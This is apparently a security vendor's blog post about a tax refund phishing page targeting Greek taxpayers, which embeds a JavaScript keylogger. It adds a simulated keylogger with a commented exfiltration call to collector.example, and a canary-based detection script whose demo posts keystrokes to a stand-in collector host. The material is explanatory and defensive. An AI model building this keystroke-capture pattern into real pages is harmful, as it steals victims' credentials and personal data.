Phishing hooks

Tax refund phish logs keystrokes to swipe personal details

There have been some smart phishing campaigns running over the last few weeks, and this one is particularly sneaky. Bleeping Computer reports that a phishing page is targeting Greek taxpayers with a tax refund scam. The added sting in the tail comes in the form of an embedded keylogger which grabs everything typed into the page, whether or not the victim ever presses submit.

An untimely tax refund

The phishing mails rely on that time-honoured tradition of bogus tax returns and non-existent refunds. The landing page, which mimics an official portal, reads as follows:

The Hellenic Tax Office has calculated your tax return, you are entitled to a tax refund of €634.13 (around $633 USD). We have tried to transfer the amount to your account. Unfortunately we were unable to confirm your current account number.

What follows is a drop-down form where the victim can select their bank and “log into the portal”. According to researchers at Cyble, there are several URLs being used to phish victims and they all do a decent job of imitating the real deal. Multiple major banks are listed in the drop-down menu, and the bogus bank pages closely resemble the real thing. Unfortunately for site visitors, this is where the previously mentioned sting in the tail comes into play.

A sneaky way to grab data

Phishing sites typically rely on the visitor hitting the submit button to send their personal information into the hands of the scammers. If someone realises something isn’t quite right at the last minute and abandons ship, the scammers are left with nothing.

In this case, the site has an embedded JavaScript keylogger ticking away in the background. Anything typed into the various entry boxes is captured as it is entered and sent to the fraudsters straight away, rather than only when the form is submitted. In this scenario, realising something is wrong may not save the victim: whatever they punched into the site up to that point will already be waiting for the phisher to retrieve at their leisure. Sure, they may have only entered information which won’t help attackers, but smart scammers using this technique will likely front-load entry forms so that the important details are asked for first.
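To make the mechanism concrete, here is an added example (not the campaign’s code, and not code from the article) that models the keylogger pattern described above. The DOM and the network are replaced by small in-memory stand-ins so it runs in Node; the field names, typed values and batching rule are all constructed for the demo.

```javascript
// Added example, not code from the campaign: a model of the "keylogger"
// pattern. The DOM and the network are replaced by in-memory stand-ins.

// Constructed stand-in for an <input> element: it supports only what the
// demo needs (addEventListener, typing characters, losing focus).
class FakeInput {
  constructor(name) {
    this.name = name;
    this.value = '';
    this.listeners = {};
  }
  addEventListener(type, fn) {
    (this.listeners[type] = this.listeners[type] || []).push(fn);
  }
  fire(type) {
    for (const fn of this.listeners[type] || []) fn({ target: this });
  }
  typeText(text) {
    // A real browser fires one 'input' event per keystroke.
    for (const ch of text) {
      this.value += ch;
      this.fire('input');
    }
  }
}

// The logger: on every input event it snapshots the field's current value and
// pushes a batch to the attacker after every `batchSize` keystrokes and again
// whenever a field loses focus. Nothing here waits for the form to be submitted.
// (Real campaigns vary: per-keystroke beacons, timers, or flush on blur only.)
function attachKeylogger(fields, exfil, batchSize = 3) {
  const snapshot = new Map();
  let unsent = 0;
  const flush = () => {
    if (snapshot.size === 0) return;
    exfil(Object.fromEntries(snapshot)); // in a real page: fetch('https://collector.example/', {method:'POST', body:...})
    snapshot.clear();
    unsent = 0;
  };
  for (const field of fields) {
    field.addEventListener('input', (e) => {
      snapshot.set(e.target.name, e.target.value);
      if (++unsent >= batchSize) flush();
    });
    field.addEventListener('blur', flush);
  }
  return flush;
}

// Merge every batch the attacker received into their latest view of each field.
function attackerView(batches) {
  return Object.assign({}, ...batches);
}

// Scenario: the victim types a username, moves to the password field, starts
// typing, gets suspicious and closes the tab. Submit is never pressed.
function simulateAbandonedVisit() {
  const received = [];
  const user = new FakeInput('username');
  const pass = new FakeInput('password');
  attachKeylogger([user, pass], (batch) => received.push(batch));

  user.typeText('maria.k'); // constructed sample input
  user.fire('blur');        // tabbing to the next field flushes the batch
  pass.typeText('Tr0ub');   // victim stops here and leaves
  // No submit. Whatever was batched out before leaving is already gone.
  return { batchesSent: received.length, attackerHas: attackerView(received) };
}

// Contrast: a plain form sends nothing until submit, so abandoning leaks nothing.
function simulateSubmitOnlyForm() {
  const received = [];
  const user = new FakeInput('username');
  const pass = new FakeInput('password');
  const submit = () => received.push({ username: user.value, password: pass.value });
  user.typeText('maria.k');
  pass.typeText('Tr0ub');
  // The victim abandons the page before submit() is ever called.
  return { batchesSent: received.length, attackerHas: attackerView(received) };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(simulateAbandonedVisit()); // attacker holds the full username and 'Tr0'
  console.log(simulateSubmitOnlyForm()); // attacker holds nothing
}
```

With a batch size of three, the abandoned visit still hands over the complete username and the first three characters of the password; a logger that beacons on every keystroke would have all of it. The submit-only form, abandoned at the same point, leaks nothing, which is exactly the gap this technique closes for the scammer.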

What can you do?

Tools used to block third-party trackers reportedly aren’t effective against this kind of embed, presumably because the logging script is part of the phishing page itself rather than a resource pulled in from a separate tracking domain. With that being the case:

  • Tax refunds are rather rare for most people, so question the authenticity of such a claim should you receive one. Contact your local tax authority directly. Many host an up-to-date list of common and current tax scams, which may help to answer your question before you’ve even picked up the phone.

  • Rogue attachments are common where fake tax refunds are concerned. If you happen to open a file from someone you weren’t expecting, don’t disable your software’s “read only” mode or its closest equivalent. Steer clear of enabling macros, too.

  • If you believe you’ve entered any data on a phishing site, there’s a small chance it had a JavaScript keylogger running under the hood. If you know your way around code, you might be able to spot it. If not, you’re left with the hassle of working out whether you need to take action. Did the site ask for logins upfront, before anything else? Payment details? Certain forms of personal information? Run through a small risk assessment checklist, and then decide whether you need to change passwords, cancel your card, or more. Assume anything you typed was captured, not just what you submitted.
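For readers who do know their way around code, the following is an added example (not from the article, and not the campaign’s code) of one practical way to spot this behaviour from the browser’s developer tools: wrap the APIs a page can use to send data (`fetch`, `XMLHttpRequest`, `navigator.sendBeacon`), type a unique canary string into a form field without submitting, and see whether the canary leaves the page. The names `installExfilMonitor`, `findCanaryLeaks` and `demo` are this example’s own; `demo()` drives the check against a constructed fake window so it also runs in Node.

```javascript
// Added example, not code from the article or the campaign: a devtools-style
// canary check for a page that ships form contents as you type.

// Wrap the outbound-request APIs on `win` (pass `window` in a browser) and
// return a log that fills up with every request the page makes.
function installExfilMonitor(win) {
  const log = [];
  const record = (api, url, body) =>
    log.push({ api, url: String(url), body: body == null ? '' : String(body) });

  if (typeof win.fetch === 'function') {
    const realFetch = win.fetch;
    win.fetch = function (input, init) {
      const url = typeof input === 'string' ? input : input && input.url;
      record('fetch', url, init && init.body);
      return realFetch.apply(this, arguments);
    };
  }
  if (win.XMLHttpRequest) {
    const proto = win.XMLHttpRequest.prototype;
    const realOpen = proto.open;
    const realSend = proto.send;
    proto.open = function (method, url) {
      this.__monitorUrl = url; // remembered so send() can log the destination
      return realOpen.apply(this, arguments);
    };
    proto.send = function (body) {
      record('xhr', this.__monitorUrl, body);
      return realSend.apply(this, arguments);
    };
  }
  if (win.navigator && typeof win.navigator.sendBeacon === 'function') {
    const realBeacon = win.navigator.sendBeacon;
    win.navigator.sendBeacon = function (url, data) {
      record('sendBeacon', url, data);
      return realBeacon.apply(this, arguments);
    };
  }
  return log;
}

// Report every recorded request whose URL or body carries at least the first
// `minPrefix` characters of the canary. A per-keystroke logger sends partial
// values, so only the last request would contain the whole string; matching a
// prefix catches the earlier ones too. A logger that encodes or encrypts its
// payload defeats substring matching, so review the full log as well.
function findCanaryLeaks(log, canary, minPrefix = 6) {
  const probe = canary.slice(0, minPrefix);
  return log.filter((r) => r.url.includes(probe) || r.body.includes(probe));
}

// Constructed demo: a fake window whose "page script" sends field contents on
// every keystroke, plus one benign ping that never sees the field. Nothing
// leaves the process; the URLs use the reserved .invalid TLD.
function demo() {
  const win = {
    fetch: () => Promise.resolve({ ok: true }),
    navigator: { sendBeacon: () => true },
  };
  const log = installExfilMonitor(win);

  const canary = 'CANARY-7f3a9c'; // what the analyst types into the form field
  win.navigator.sendBeacon('https://analytics.invalid/ping', 'page=refund');
  let typed = '';
  for (const ch of canary) {
    typed += ch; // the page's logger sends the field after each keystroke
    win.fetch('https://collector.invalid/k', {
      method: 'POST',
      body: JSON.stringify({ field: 'iban', value: typed }),
    });
  }
  const leaks = findCanaryLeaks(log, canary);
  return {
    requestsSeen: log.length,
    leaks: leaks.length,
    leakApis: [...new Set(leaks.map((r) => r.api))],
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo()); // 14 requests seen, 8 of them carrying the canary prefix
}
```

In a browser you would paste the two functions into the console on the suspect page, run `const log = installExfilMonitor(window)`, type the canary into a field (never a real credential), and then call `findCanaryLeaks(log, 'CANARY-7f3a9c')`. Treat a clean result as inconclusive rather than a pass: a page script can capture a reference to the original `fetch` before you install the wrapper, or exfiltrate through channels this snippet does not hook (an `<img>` source, a WebSocket, a hidden form submission), so the network panel remains the authoritative view.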

Malwarebytes users are protected from the domains used in this attack. Stay safe out there!


Christopher Boyd

Former Director of Research at FaceTime Security Labs. He has a very particular set of skills. Skills that make him a nightmare for threats like you.